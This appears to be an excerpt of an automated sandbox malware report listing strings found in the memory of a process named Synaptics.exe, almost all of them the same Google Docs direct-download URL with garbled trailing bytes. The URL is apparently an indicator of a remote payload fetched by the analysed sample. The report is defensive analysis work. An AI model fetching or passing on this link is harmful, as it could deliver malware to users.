                                      Source: Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download()
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(h
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(o
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.0000000000675000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)d
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download--
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-2
                                      Source: Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-9
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-U
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-UY3
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-itX
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-p
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-v53
                                      Source: Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2535106563.000000001CFC6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.00000000070A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.-1_#
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download...
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.goo:
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.jq
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.net
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.q
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.xlsx
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/7
                                      Source: Synaptics.exe, 00000002.00000002.2510648503.00000000193FE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/Z
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/_
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/d3
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/fv_?
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0(
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download02e.
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0:#
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0pg
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1/
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1?
                                      Source: Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2h
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2o
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3-
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download30?
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3d
                                      Source: Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4=
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4I
                                      Source: Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download50
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2535106563.000000001CFC6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                                      Source: Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download79
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7=9_)
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7Z
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7i
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2503903796.0000000014F3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSe
                                      Source: Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSec-Cq
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSecurZ
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTh
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadThe
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1770138974.000000000543D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU/
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUIE.x
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUTZ
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUk
                                      Source: Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2535106563.000000001CFC6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVGRAy
                                      Source: Synaptics.exe, 00000002.00000002.2535106563.000000001CFE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVk&export=download
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWI
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWo
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXS
                                      Source: Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY6
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY=
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYa
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYe
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2535106563.000000001CFC6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2535106563.000000001CFAD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ7
